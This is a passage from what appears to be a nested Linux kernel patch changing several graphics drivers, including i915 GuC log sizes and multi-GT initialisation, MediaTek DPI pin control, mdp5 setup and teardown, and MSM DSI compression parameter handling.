+ #if defined(CONFIG_DRM_I915_DEBUG_GUC)
+ #define GUC_LOG_DEFAULT_CRASH_BUFFER_SIZE	SZ_2M
+ #define GUC_LOG_DEFAULT_DEBUG_BUFFER_SIZE	SZ_16M
+-#define GUC_LOG_DEFAULT_CAPTURE_BUFFER_SIZE	SZ_4M
++#define GUC_LOG_DEFAULT_CAPTURE_BUFFER_SIZE	SZ_1M
+ #elif defined(CONFIG_DRM_I915_DEBUG_GEM)
+ #define GUC_LOG_DEFAULT_CRASH_BUFFER_SIZE	SZ_1M
+ #define GUC_LOG_DEFAULT_DEBUG_BUFFER_SIZE	SZ_2M
+-#define GUC_LOG_DEFAULT_CAPTURE_BUFFER_SIZE	SZ_4M
++#define GUC_LOG_DEFAULT_CAPTURE_BUFFER_SIZE	SZ_1M
+ #else
+ #define GUC_LOG_DEFAULT_CRASH_BUFFER_SIZE	SZ_8K
+ #define GUC_LOG_DEFAULT_DEBUG_BUFFER_SIZE	SZ_64K
+-#define GUC_LOG_DEFAULT_CAPTURE_BUFFER_SIZE	SZ_2M
++#define GUC_LOG_DEFAULT_CAPTURE_BUFFER_SIZE	SZ_1M
+ #endif
+ 
+ static void guc_log_copy_debuglogs_for_relay(struct intel_guc_log *log);
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
+index 1db59eeb34db9..1a23e901cc663 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
+@@ -2429,6 +2429,10 @@ static int guc_context_policy_init_v70(struct intel_context *ce, bool loop)
+ 	int ret;
+ 
+ 	/* NB: For both of these, zero means disabled. */
++	GEM_BUG_ON(overflows_type(engine->props.timeslice_duration_ms * 1000,
++				  execution_quantum));
++	GEM_BUG_ON(overflows_type(engine->props.preempt_timeout_ms * 1000,
++				  preemption_timeout));
+ 	execution_quantum = engine->props.timeslice_duration_ms * 1000;
+ 	preemption_timeout = engine->props.preempt_timeout_ms * 1000;
+ 
+@@ -2462,6 +2466,10 @@ static void guc_context_policy_init_v69(struct intel_engine_cs *engine,
+ 		desc->policy_flags |= CONTEXT_POLICY_FLAG_PREEMPT_TO_IDLE_V69;
+ 
+ 	/* NB: For both of these, zero means disabled. */
++	GEM_BUG_ON(overflows_type(engine->props.timeslice_duration_ms * 1000,
++				  desc->execution_quantum));
++	GEM_BUG_ON(overflows_type(engine->props.preempt_timeout_ms * 1000,
++				  desc->preemption_timeout));
+ 	desc->execution_quantum = engine->props.timeslice_duration_ms * 1000;
+ 	desc->preemption_timeout = engine->props.preempt_timeout_ms * 1000;
+ }
+diff --git a/drivers/gpu/drm/i915/i915_driver.c b/drivers/gpu/drm/i915/i915_driver.c
+index f2a15d8155f4a..2ce30cff461a0 100644
+--- a/drivers/gpu/drm/i915/i915_driver.c
++++ b/drivers/gpu/drm/i915/i915_driver.c
+@@ -1662,7 +1662,8 @@ static int intel_runtime_suspend(struct device *kdev)
+ 
+ 		intel_runtime_pm_enable_interrupts(dev_priv);
+ 
+-		intel_gt_runtime_resume(to_gt(dev_priv));
++		for_each_gt(gt, dev_priv, i)
++			intel_gt_runtime_resume(gt);
+ 
+ 		enable_rpm_wakeref_asserts(rpm);
+ 
+diff --git a/drivers/gpu/drm/i915/i915_gem.c b/drivers/gpu/drm/i915/i915_gem.c
+index 2bdddb61ebd7a..38c26668b9602 100644
+--- a/drivers/gpu/drm/i915/i915_gem.c
++++ b/drivers/gpu/drm/i915/i915_gem.c
+@@ -843,7 +843,7 @@ void i915_gem_runtime_suspend(struct drm_i915_private *i915)
+ 		__i915_gem_object_release_mmap_gtt(obj);
+ 
+ 	list_for_each_entry_safe(obj, on,
+-				 &to_gt(i915)->lmem_userfault_list, userfault_link)
++				 &i915->runtime_pm.lmem_userfault_list, userfault_link)
+ 		i915_gem_object_runtime_pm_release_mmap_offset(obj);
+ 
+ 	/*
+@@ -1128,6 +1128,8 @@ void i915_gem_drain_workqueue(struct drm_i915_private *i915)
+ 
+ int i915_gem_init(struct drm_i915_private *dev_priv)
+ {
++	struct intel_gt *gt;
++	unsigned int i;
+ 	int ret;
+ 
+ 	/* We need to fallback to 4K pages if host doesn't support huge gtt. */
+@@ -1158,9 +1160,11 @@ int i915_gem_init(struct drm_i915_private *dev_priv)
+ 	 */
+ 	intel_init_clock_gating(dev_priv);
+ 
+-	ret = intel_gt_init(to_gt(dev_priv));
+-	if (ret)
+-		goto err_unlock;
++	for_each_gt(gt, dev_priv, i) {
++		ret = intel_gt_init(gt);
++		if (ret)
++			goto err_unlock;
++	}
+ 
+ 	return 0;
+ 
+@@ -1173,8 +1177,13 @@ int i915_gem_init(struct drm_i915_private *dev_priv)
+ err_unlock:
+ 	i915_gem_drain_workqueue(dev_priv);
+ 
+-	if (ret != -EIO)
+-		intel_uc_cleanup_firmwares(&to_gt(dev_priv)->uc);
++	if (ret != -EIO) {
++		for_each_gt(gt, dev_priv, i) {
++			intel_gt_driver_remove(gt);
++			intel_gt_driver_release(gt);
++			intel_uc_cleanup_firmwares(&gt->uc);
++		}
++	}
+ 
+ 	if (ret == -EIO) {
+ 		/*
+@@ -1182,10 +1191,12 @@ err_unlock:
+ 		 * as wedged. But we only want to do this when the GPU is angry,
+ 		 * for all other failure, such as an allocation failure, bail.
+ 		 */
+-		if (!intel_gt_is_wedged(to_gt(dev_priv))) {
+-			i915_probe_error(dev_priv,
+-					 "Failed to initialize GPU, declaring it wedged!\n");
+-			intel_gt_set_wedged(to_gt(dev_priv));
++		for_each_gt(gt, dev_priv, i) {
++			if (!intel_gt_is_wedged(gt)) {
++				i915_probe_error(dev_priv,
++						 "Failed to initialize GPU, declaring it wedged!\n");
++				intel_gt_set_wedged(gt);
++			}
+ 		}
+ 
+ 		/* Minimal basic recovery for KMS */
+@@ -1213,10 +1224,12 @@ void i915_gem_driver_unregister(struct drm_i915_private *i915)
+ 
+ void i915_gem_driver_remove(struct drm_i915_private *dev_priv)
+ {
+-	intel_wakeref_auto_fini(&to_gt(dev_priv)->userfault_wakeref);
++	struct intel_gt *gt;
++	unsigned int i;
+ 
+ 	i915_gem_suspend_late(dev_priv);
+-	intel_gt_driver_remove(to_gt(dev_priv));
++	for_each_gt(gt, dev_priv, i)
++		intel_gt_driver_remove(gt);
+ 	dev_priv->uabi_engines = RB_ROOT;
+ 
+ 	/* Flush any outstanding unpin_work. */
+@@ -1227,9 +1240,13 @@ void i915_gem_driver_remove(struct drm_i915_private *dev_priv)
+ 
+ void i915_gem_driver_release(struct drm_i915_private *dev_priv)
+ {
+-	intel_gt_driver_release(to_gt(dev_priv));
++	struct intel_gt *gt;
++	unsigned int i;
+ 
+-	intel_uc_cleanup_firmwares(&to_gt(dev_priv)->uc);
++	for_each_gt(gt, dev_priv, i) {
++		intel_gt_driver_release(gt);
++		intel_uc_cleanup_firmwares(&gt->uc);
++	}
+ 
+ 	/* Flush any outstanding work, including i915_gem_context.release_work. */
+ 	i915_gem_drain_workqueue(dev_priv);
+diff --git a/drivers/gpu/drm/i915/intel_runtime_pm.c b/drivers/gpu/drm/i915/intel_runtime_pm.c
+index 744cca507946b..129746713d072 100644
+--- a/drivers/gpu/drm/i915/intel_runtime_pm.c
++++ b/drivers/gpu/drm/i915/intel_runtime_pm.c
+@@ -633,6 +633,8 @@ void intel_runtime_pm_driver_release(struct intel_runtime_pm *rpm)
+ 						     runtime_pm);
+ 	int count = atomic_read(&rpm->wakeref_count);
+ 
++	intel_wakeref_auto_fini(&rpm->userfault_wakeref);
++
+ 	drm_WARN(&i915->drm, count,
+ 		 "i915 raw-wakerefs=%d wakelocks=%d on cleanup\n",
+ 		 intel_rpm_raw_wakeref_count(count),
+@@ -652,4 +654,7 @@ void intel_runtime_pm_init_early(struct intel_runtime_pm *rpm)
+ 	rpm->available = HAS_RUNTIME_PM(i915);
+ 
+ 	init_intel_runtime_pm_wakeref(rpm);
++	INIT_LIST_HEAD(&rpm->lmem_userfault_list);
++	spin_lock_init(&rpm->lmem_userfault_lock);
++	intel_wakeref_auto_init(&rpm->userfault_wakeref, rpm);
+ }
+diff --git a/drivers/gpu/drm/i915/intel_runtime_pm.h b/drivers/gpu/drm/i915/intel_runtime_pm.h
+index d9160e3ff4afc..98b8b28baaa15 100644
+--- a/drivers/gpu/drm/i915/intel_runtime_pm.h
++++ b/drivers/gpu/drm/i915/intel_runtime_pm.h
+@@ -53,6 +53,28 @@ struct intel_runtime_pm {
+ 	bool irqs_enabled;
+ 	bool no_wakeref_tracking;
+ 
++	/*
++	 *  Protects access to lmem usefault list.
++	 *  It is required, if we are outside of the runtime suspend path,
++	 *  access to @lmem_userfault_list requires always first grabbing the
++	 *  runtime pm, to ensure we can't race against runtime suspend.
++	 *  Once we have that we also need to grab @lmem_userfault_lock,
++	 *  at which point we have exclusive access.
++	 *  The runtime suspend path is special since it doesn't really hold any locks,
++	 *  but instead has exclusive access by virtue of all other accesses requiring
++	 *  holding the runtime pm wakeref.
++	 */
++	spinlock_t lmem_userfault_lock;
++
++	/*
++	 *  Keep list of userfaulted gem obj, which require to release their
++	 *  mmap mappings at runtime suspend path.
++	 */
++	struct list_head lmem_userfault_list;
++
++	/* Manual runtime pm autosuspend delay for user GGTT/lmem mmaps */
++	struct intel_wakeref_auto userfault_wakeref;
++
+ #if IS_ENABLED(CONFIG_DRM_I915_DEBUG_RUNTIME_PM)
+ 	/*
+ 	 * To aide detection of wakeref leaks and general misuse, we
+diff --git a/drivers/gpu/drm/mediatek/mtk_dpi.c b/drivers/gpu/drm/mediatek/mtk_dpi.c
+index 508a6d994e831..1f5d39a4077cd 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dpi.c
++++ b/drivers/gpu/drm/mediatek/mtk_dpi.c
+@@ -461,9 +461,6 @@ static void mtk_dpi_power_off(struct mtk_dpi *dpi)
+ 	if (--dpi->refcount != 0)
+ 		return;
+ 
+-	if (dpi->pinctrl && dpi->pins_gpio)
+-		pinctrl_select_state(dpi->pinctrl, dpi->pins_gpio);
+-
+ 	mtk_dpi_disable(dpi);
+ 	clk_disable_unprepare(dpi->pixel_clk);
+ 	clk_disable_unprepare(dpi->engine_clk);
+@@ -488,9 +485,6 @@ static int mtk_dpi_power_on(struct mtk_dpi *dpi)
+ 		goto err_pixel;
+ 	}
+ 
+-	if (dpi->pinctrl && dpi->pins_dpi)
+-		pinctrl_select_state(dpi->pinctrl, dpi->pins_dpi);
+-
+ 	return 0;
+ 
+ err_pixel:
+@@ -721,12 +715,18 @@ static void mtk_dpi_bridge_disable(struct drm_bridge *bridge)
+ 	struct mtk_dpi *dpi = bridge_to_dpi(bridge);
+ 
+ 	mtk_dpi_power_off(dpi);
++
++	if (dpi->pinctrl && dpi->pins_gpio)
++		pinctrl_select_state(dpi->pinctrl, dpi->pins_gpio);
+ }
+ 
+ static void mtk_dpi_bridge_enable(struct drm_bridge *bridge)
+ {
+ 	struct mtk_dpi *dpi = bridge_to_dpi(bridge);
+ 
++	if (dpi->pinctrl && dpi->pins_dpi)
++		pinctrl_select_state(dpi->pinctrl, dpi->pins_dpi);
++
+ 	mtk_dpi_power_on(dpi);
+ 	mtk_dpi_set_display_mode(dpi, &dpi->mode);
+ 	mtk_dpi_enable(dpi);
+diff --git a/drivers/gpu/drm/mediatek/mtk_hdmi.c b/drivers/gpu/drm/mediatek/mtk_hdmi.c
+index 4c80b6896dc3d..6e8f99554f548 100644
+--- a/drivers/gpu/drm/mediatek/mtk_hdmi.c
++++ b/drivers/gpu/drm/mediatek/mtk_hdmi.c
+@@ -1202,9 +1202,10 @@ static enum drm_connector_status mtk_hdmi_detect(struct mtk_hdmi *hdmi)
+ 	return mtk_hdmi_update_plugged_status(hdmi);
+ }
+ 
+-static int mtk_hdmi_bridge_mode_valid(struct drm_bridge *bridge,
+-				      const struct drm_display_info *info,
+-				      const struct drm_display_mode *mode)
++static enum drm_mode_status
++mtk_hdmi_bridge_mode_valid(struct drm_bridge *bridge,
++			   const struct drm_display_info *info,
++			   const struct drm_display_mode *mode)
+ {
+ 	struct mtk_hdmi *hdmi = hdmi_ctx_from_bridge(bridge);
+ 	struct drm_bridge *next_bridge;
+diff --git a/drivers/gpu/drm/meson/meson_encoder_cvbs.c b/drivers/gpu/drm/meson/meson_encoder_cvbs.c
+index 5675bc2a92cf8..3f73b211fa8e3 100644
+--- a/drivers/gpu/drm/meson/meson_encoder_cvbs.c
++++ b/drivers/gpu/drm/meson/meson_encoder_cvbs.c
+@@ -116,9 +116,10 @@ static int meson_encoder_cvbs_get_modes(struct drm_bridge *bridge,
+ 	return i;
+ }
+ 
+-static int meson_encoder_cvbs_mode_valid(struct drm_bridge *bridge,
+-					const struct drm_display_info *display_info,
+-					const struct drm_display_mode *mode)
++static enum drm_mode_status
++meson_encoder_cvbs_mode_valid(struct drm_bridge *bridge,
++			      const struct drm_display_info *display_info,
++			      const struct drm_display_mode *mode)
+ {
+ 	if (meson_cvbs_get_mode(mode))
+ 		return MODE_OK;
+diff --git a/drivers/gpu/drm/msm/adreno/a6xx_gpu.c b/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
+index fdc578016e0bf..e846e629c00d8 100644
+--- a/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
+@@ -1906,7 +1906,7 @@ static u32 fuse_to_supp_hw(struct device *dev, struct adreno_rev rev, u32 fuse)
+ 
+ 	if (val == UINT_MAX) {
+ 		DRM_DEV_ERROR(dev,
+-			"missing support for speed-bin: %u. Some OPPs may not be supported by hardware",
++			"missing support for speed-bin: %u. Some OPPs may not be supported by hardware\n",
+ 			fuse);
+ 		return UINT_MAX;
+ 	}
+@@ -1916,7 +1916,7 @@ static u32 fuse_to_supp_hw(struct device *dev, struct adreno_rev rev, u32 fuse)
+ 
+ static int a6xx_set_supported_hw(struct device *dev, struct adreno_rev rev)
+ {
+-	u32 supp_hw = UINT_MAX;
++	u32 supp_hw;
+ 	u32 speedbin;
+ 	int ret;
+ 
+@@ -1928,15 +1928,13 @@ static int a6xx_set_supported_hw(struct device *dev, struct adreno_rev rev)
+ 	if (ret == -ENOENT) {
+ 		return 0;
+ 	} else if (ret) {
+-		DRM_DEV_ERROR(dev,
+-			      "failed to read speed-bin (%d). Some OPPs may not be supported by hardware",
+-			      ret);
+-		goto done;
++		dev_err_probe(dev, ret,
++			      "failed to read speed-bin. Some OPPs may not be supported by hardware\n");
++		return ret;
+ 	}
+ 
+ 	supp_hw = fuse_to_supp_hw(dev, rev, speedbin);
+ 
+-done:
+ 	ret = devm_pm_opp_set_supported_hw(dev, &supp_hw, 1);
+ 	if (ret)
+ 		return ret;
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_dsc.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_dsc.c
+index f2ddcfb6f7ee6..3662df698dae5 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_dsc.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_dsc.c
+@@ -42,7 +42,7 @@ static void dpu_hw_dsc_config(struct dpu_hw_dsc *hw_dsc,
+ 			      u32 initial_lines)
+ {
+ 	struct dpu_hw_blk_reg_map *c = &hw_dsc->hw;
+-	u32 data, lsb, bpp;
++	u32 data;
+ 	u32 slice_last_group_size;
+ 	u32 det_thresh_flatness;
+ 	bool is_cmd_mode = !(mode & DSC_MODE_VIDEO);
+@@ -56,14 +56,7 @@ static void dpu_hw_dsc_config(struct dpu_hw_dsc *hw_dsc,
+ 	data = (initial_lines << 20);
+ 	data |= ((slice_last_group_size - 1) << 18);
+ 	/* bpp is 6.4 format, 4 LSBs bits are for fractional part */
+-	data |= dsc->bits_per_pixel << 12;
+-	lsb = dsc->bits_per_pixel % 4;
+-	bpp = dsc->bits_per_pixel / 4;
+-	bpp *= 4;
+-	bpp <<= 4;
+-	bpp |= lsb;
+-
+-	data |= bpp << 8;
++	data |= (dsc->bits_per_pixel << 8);
+ 	data |= (dsc->block_pred_enable << 7);
+ 	data |= (dsc->line_buf_depth << 3);
+ 	data |= (dsc->simple_422 << 2);
+diff --git a/drivers/gpu/drm/msm/disp/mdp5/mdp5_kms.c b/drivers/gpu/drm/msm/disp/mdp5/mdp5_kms.c
+index b0d21838a1343..29ae5c9613f36 100644
+--- a/drivers/gpu/drm/msm/disp/mdp5/mdp5_kms.c
++++ b/drivers/gpu/drm/msm/disp/mdp5/mdp5_kms.c
+@@ -203,7 +203,7 @@ static int mdp5_set_split_display(struct msm_kms *kms,
+ 							  slave_encoder);
+ }
+ 
+-static void mdp5_destroy(struct platform_device *pdev);
++static void mdp5_destroy(struct mdp5_kms *mdp5_kms);
+ 
+ static void mdp5_kms_destroy(struct msm_kms *kms)
+ {
+@@ -223,7 +223,7 @@ static void mdp5_kms_destroy(struct msm_kms *kms)
+ 	}
+ 
+ 	mdp_kms_destroy(&mdp5_kms->base);
+-	mdp5_destroy(mdp5_kms->pdev);
++	mdp5_destroy(mdp5_kms);
+ }
+ 
+ #ifdef CONFIG_DEBUG_FS
+@@ -559,6 +559,8 @@ static int mdp5_kms_init(struct drm_device *dev)
+ 	int irq, i, ret;
+ 
+ 	ret = mdp5_init(to_platform_device(dev->dev), dev);
++	if (ret)
++		return ret;
+ 
+ 	/* priv->kms would have been populated by the MDP5 driver */
+ 	kms = priv->kms;
+@@ -632,9 +634,8 @@ fail:
+ 	return ret;
+ }
+ 
+-static void mdp5_destroy(struct platform_device *pdev)
++static void mdp5_destroy(struct mdp5_kms *mdp5_kms)
+ {
+-	struct mdp5_kms *mdp5_kms = platform_get_drvdata(pdev);
+ 	int i;
+ 
+ 	if (mdp5_kms->ctlm)
+@@ -648,7 +649,7 @@ static void mdp5_destroy(struct platform_device *pdev)
+ 		kfree(mdp5_kms->intfs[i]);
+ 
+ 	if (mdp5_kms->rpm_enabled)
+-		pm_runtime_disable(&pdev->dev);
++		pm_runtime_disable(&mdp5_kms->pdev->dev);
+ 
+ 	drm_atomic_private_obj_fini(&mdp5_kms->glob_state);
+ 	drm_modeset_lock_fini(&mdp5_kms->glob_state_lock);
+@@ -797,8 +798,6 @@ static int mdp5_init(struct platform_device *pdev, struct drm_device *dev)
+ 		goto fail;
+ 	}
+ 
+-	platform_set_drvdata(pdev, mdp5_kms);
+-
+ 	spin_lock_init(&mdp5_kms->resource_lock);
+ 
+ 	mdp5_kms->dev = dev;
+@@ -839,6 +838,9 @@ static int mdp5_init(struct platform_device *pdev, struct drm_device *dev)
+ 	 */
+ 	clk_set_rate(mdp5_kms->core_clk, 200000000);
+ 
++	/* set uninit-ed kms */
++	priv->kms = &mdp5_kms->base.base;
++
+ 	pm_runtime_enable(&pdev->dev);
+ 	mdp5_kms->rpm_enabled = true;
+ 
+@@ -890,13 +892,10 @@ static int mdp5_init(struct platform_device *pdev, struct drm_device *dev)
+ 	if (ret)
+ 		goto fail;
+ 
+-	/* set uninit-ed kms */
+-	priv->kms = &mdp5_kms->base.base;
+-
+ 	return 0;
+ fail:
+ 	if (mdp5_kms)
+-		mdp5_destroy(pdev);
++		mdp5_destroy(mdp5_kms);
+ 	return ret;
+ }
+ 
+@@ -953,7 +952,8 @@ static int mdp5_dev_remove(struct platform_device *pdev)
+ static __maybe_unused int mdp5_runtime_suspend(struct device *dev)
+ {
+ 	struct platform_device *pdev = to_platform_device(dev);
+-	struct mdp5_kms *mdp5_kms = platform_get_drvdata(pdev);
++	struct msm_drm_private *priv = platform_get_drvdata(pdev);
++	struct mdp5_kms *mdp5_kms = to_mdp5_kms(to_mdp_kms(priv->kms));
+ 
+ 	DBG("");
+ 
+@@ -963,7 +963,8 @@ static __maybe_unused int mdp5_runtime_suspend(struct device *dev)
+ static __maybe_unused int mdp5_runtime_resume(struct device *dev)
+ {
+ 	struct platform_device *pdev = to_platform_device(dev);
+-	struct mdp5_kms *mdp5_kms = platform_get_drvdata(pdev);
++	struct msm_drm_private *priv = platform_get_drvdata(pdev);
++	struct mdp5_kms *mdp5_kms = to_mdp5_kms(to_mdp_kms(priv->kms));
+ 
+ 	DBG("");
+ 
+diff --git a/drivers/gpu/drm/msm/dp/dp_display.c b/drivers/gpu/drm/msm/dp/dp_display.c
+index a49f6dbbe8883..c9d9b384ddd03 100644
+--- a/drivers/gpu/drm/msm/dp/dp_display.c
++++ b/drivers/gpu/drm/msm/dp/dp_display.c
+@@ -857,7 +857,7 @@ static int dp_display_set_mode(struct msm_dp *dp_display,
+ 
+ 	dp = container_of(dp_display, struct dp_display_private, dp_display);
+ 
+-	dp->panel->dp_mode.drm_mode = mode->drm_mode;
++	drm_mode_copy(&dp->panel->dp_mode.drm_mode, &mode->drm_mode);
+ 	dp->panel->dp_mode.bpp = mode->bpp;
+ 	dp->panel->dp_mode.capabilities = mode->capabilities;
+ 	dp_panel_init_panel_info(dp->panel);
+diff --git a/drivers/gpu/drm/msm/dsi/dsi_host.c b/drivers/gpu/drm/msm/dsi/dsi_host.c
+index 7fbf391c024f8..89aadd3b3202b 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi_host.c
++++ b/drivers/gpu/drm/msm/dsi/dsi_host.c
+@@ -21,6 +21,7 @@
+ 
+ #include <video/mipi_display.h>
+ 
++#include <drm/display/drm_dsc_helper.h>
+ #include <drm/drm_of.h>
+ 
+ #include "dsi.h"
+@@ -33,7 +34,7 @@
+ 
+ #define DSI_RESET_TOGGLE_DELAY_MS 20
+ 
+-static int dsi_populate_dsc_params(struct drm_dsc_config *dsc);
++static int dsi_populate_dsc_params(struct msm_dsi_host *msm_host, struct drm_dsc_config *dsc);
+ 
+ static int dsi_get_version(const void __iomem *base, u32 *major, u32 *minor)
+ {
+@@ -842,17 +843,15 @@ static void dsi_ctrl_config(struct msm_dsi_host *msm_host, bool enable,
+ static void dsi_update_dsc_timing(struct msm_dsi_host *msm_host, bool is_cmd_mode, u32 hdisplay)
+ {
+ 	struct drm_dsc_config *dsc = msm_host->dsc;
+-	u32 reg, intf_width, reg_ctrl, reg_ctrl2;
++	u32 reg, reg_ctrl, reg_ctrl2;
+ 	u32 slice_per_intf, total_bytes_per_intf;
+ 	u32 pkt_per_line;
+-	u32 bytes_in_slice;
+ 	u32 eol_byte_num;
+ 
+ 	/* first calculate dsc parameters and then program
+ 	 * compress mode registers
+ 	 */
+-	intf_width = hdisplay;
+-	slice_per_intf = DIV_ROUND_UP(intf_width, dsc->slice_width);
++	slice_per_intf = DIV_ROUND_UP(hdisplay, dsc->slice_width);
+ 
+ 	/* If slice_per_pkt is greater than slice_per_intf
+ 	 * then default to 1. This can happen during partial
+@@ -861,12 +860,7 @@ static void dsi_update_dsc_timing(struct msm_dsi_host *msm_host, bool is_cmd_mod
+ 	if (slice_per_intf > dsc->slice_count)
+ 		dsc->slice_count = 1;
+ 
+-	slice_per_intf = DIV_ROUND_UP(hdisplay, dsc->slice_width);
+-	bytes_in_slice = DIV_ROUND_UP(dsc->slice_width * dsc->bits_per_pixel, 8);
+-
+-	dsc->slice_chunk_size = bytes_in_slice;
+-
+-	total_bytes_per_intf = bytes_in_slice * slice_per_intf;
++	total_bytes_per_intf = dsc->slice_chunk_size * slice_per_intf;
+ 
+ 	eol_byte_num = total_bytes_per_intf % 3;
+ 	pkt_per_line = slice_per_intf / dsc->slice_count;
+@@ -892,7 +886,7 @@ static void dsi_update_dsc_timing(struct msm_dsi_host *msm_host, bool is_cmd_mod
+ 		reg_ctrl |= reg;
+ 
+ 		reg_ctrl2 &= ~DSI_COMMAND_COMPRESSION_MODE_CTRL2_STREAM0_SLICE_WIDTH__MASK;
+-		reg_ctrl2 |= DSI_COMMAND_COMPRESSION_MODE_CTRL2_STREAM0_SLICE_WIDTH(bytes_in_slice);
++		reg_ctrl2 |= DSI_COMMAND_COMPRESSION_MODE_CTRL2_STREAM0_SLICE_WIDTH(dsc->slice_chunk_size);
+ 
+ 		dsi_write(msm_host, REG_DSI_COMMAND_COMPRESSION_MODE_CTRL, reg_ctrl);
+ 		dsi_write(msm_host, REG_DSI_COMMAND_COMPRESSION_MODE_CTRL2, reg_ctrl2);
+@@ -915,6 +909,7 @@ static void dsi_timing_setup(struct msm_dsi_host *msm_host, bool is_bonded_dsi)
+ 	u32 va_end = va_start + mode->vdisplay;
+ 	u32 hdisplay = mode->hdisplay;
+ 	u32 wc;
++	int ret;
+ 
+ 	DBG("");
+ 
+@@ -950,7 +945,9 @@ static void dsi_timing_setup(struct msm_dsi_host *msm_host, bool is_bonded_dsi)
+ 		/* we do the calculations for dsc parameters here so that
+ 		 * panel can use these parameters
+ 		 */
+-		dsi_populate_dsc_params(dsc);
++		ret = dsi_populate_dsc_params(msm_host, dsc);
++		if (ret)
++			return;
+ 
+ 		/* Divide the display by 3 but keep back/font porch and
+ 		 * pulse width same
+@@ -1754,18 +1751,20 @@ static char bpg_offset[DSC_NUM_BUF_RANGES] = {
+ 	2, 0, 0, -2, -4, -6, -8, -8, -8, -10, -10, -12, -12, -12, -12
+ };
+ 
+-static int dsi_populate_dsc_params(struct drm_dsc_config *dsc)
+-{
+-	int mux_words_size;
+-	int groups_per_line, groups_total;
+-	int min_rate_buffer_size;
+-	int hrd_delay;
+-	int pre_num_extra_mux_bits, num_extra_mux_bits;
+-	int slice_bits;
+-	int target_bpp_x16;
+-	int data;
+-	int final_value, final_scale;
++static int dsi_populate_dsc_params(struct msm_dsi_host *msm_host, struct drm_dsc_config *dsc)
++{
+ 	int i;
++	u16 bpp = dsc->bits_per_pixel >> 4;
++
++	if (dsc->bits_per_pixel & 0xf) {
++		DRM_DEV_ERROR(&msm_host->pdev->dev, "DSI does not support fractional bits_per_pixel\n");
++		return -EINVAL;
++	}
++
++	if (dsc->bits_per_component != 8) {
++		DRM_DEV_ERROR(&msm_host->pdev->dev, "DSI does not support bits_per_component != 8 yet\n");
++		return -EOPNOTSUPP;
++	}
+ 
+ 	dsc->rc_model_size = 8192;
+ 	dsc->first_line_bpg_offset = 12;
+@@ -1783,16 +1782,21 @@ static int dsi_populate_dsc_params(struct drm_dsc_config *dsc)
+ 	for (i = 0; i < DSC_NUM_BUF_RANGES; i++) {
+ 		dsc->rc_range_params[i].range_min_qp = min_qp[i];
+ 		dsc->rc_range_params[i].range_max_qp = max_qp[i];
+-		dsc->rc_range_params[i].range_bpg_offset = bpg_offset[i];
++		/*
++		 * Range BPG Offset contains two's-complement signed values that fill
++		 * 8 bits, yet the registers and DCS PPS field are only 6 bits wide.
++		 */
++		dsc->rc_range_params[i].range_bpg_offset = bpg_offset[i] & DSC_RANGE_BPG_OFFSET_MASK;
+ 	}
+ 
+-	dsc->initial_offset = 6144; /* Not bpp 12 */
+-	if (dsc->bits_per_pixel != 8)
++	dsc->initial_offset = 6144;		/* Not bpp 12 */
++	if (bpp != 8)
+ 		dsc->initial_offset = 2048;	/* bpp = 12 */
+ 
+-	mux_words_size = 48;		/* bpc == 8/10 */
+-	if (dsc->bits_per_component == 12)
+-		mux_words_size = 64;
++	if (dsc->bits_per_component <= 10)
++		dsc->mux_word_size = DSC_MUX_WORD_SIZE_8_10_BPC;
++	else
++		dsc->mux_word_size = DSC_MUX_WORD_SIZE_12_BPC;
+ 
+ 	dsc->initial_xmit_delay = 512;
+ 	dsc->initial_scale_value = 32;
+@@ -1804,63 +1808,8 @@ static int dsi_populate_dsc_params(struct drm_dsc_config *dsc)
+ 	dsc->flatness_max_qp = 12;
+ 	dsc->rc_quant_incr_limit0 = 11;
+ 	dsc->rc_quant_incr_limit1 = 11;
+-	dsc->mux_word_size = DSC_MUX_WORD_SIZE_8_10_BPC;
+-
+-	/* FIXME: need to call drm_dsc_compute_rc_parameters() so that rest of
+-	 * params are calculated
+-	 */
+-	groups_per_line = DIV_ROUND_UP(dsc->slice_width, 3);
+-	dsc->slice_chunk_size = dsc->slice_width * dsc->bits_per_pixel / 8;
+-	if ((dsc->slice_width * dsc->bits_per_pixel) % 8)
+-		dsc->slice_chunk_size++;
+ 
+-	/* rbs-min */
+-	min_rate_buffer_size =  dsc->rc_model_size - dsc->initial_offset +
+-				dsc->initial_xmit_delay * dsc->bits_per_pixel +
+-				groups_per_line * dsc->first_line_bpg_offset;
+-
+-	hrd_delay = DIV_ROUND_UP(min_rate_buffer_size, dsc->bits_per_pixel);
+-
+-	dsc->initial_dec_delay = hrd_delay - dsc->initial_xmit_delay;
+-
+-	dsc->initial_scale_value = 8 * dsc->rc_model_size /
+-				       (dsc->rc_model_size - dsc->initial_offset);
+-
+-	slice_bits = 8 * dsc->slice_chunk_size * dsc->slice_height;
+-
+-	groups_total = groups_per_line * dsc->slice_height;
+-
+-	data = dsc->first_line_bpg_offset * 2048;
+-
+-	dsc->nfl_bpg_offset = DIV_ROUND_UP(data, (dsc->slice_height - 1));
+-
+-	pre_num_extra_mux_bits = 3 * (mux_words_size + (4 * dsc->bits_per_component + 4) - 2);
+-
+-	num_extra_mux_bits = pre_num_extra_mux_bits - (mux_words_size -
+-			     ((slice_bits - pre_num_extra_mux_bits) % mux_words_size));
+-
+-	data = 2048 * (dsc->rc_model_size - dsc->initial_offset + num_extra_mux_bits);
+-	dsc->slice_bpg_offset = DIV_ROUND_UP(data, groups_total);
+-
+-	/* bpp * 16 + 0.5 */
+-	data = dsc->bits_per_pixel * 16;
+-	data *= 2;
+-	data++;
+-	data /= 2;
+-	target_bpp_x16 = data;
+-
+-	data = (dsc->initial_xmit_delay * target_bpp_x16) / 16;
+-	final_value =  dsc->rc_model_size - data + num_extra_mux_bits;
+-	dsc->final_offset = final_value;
+-
+-	final_scale = 8 * dsc->rc_model_size / (dsc->rc_model_size - final_value);
+-
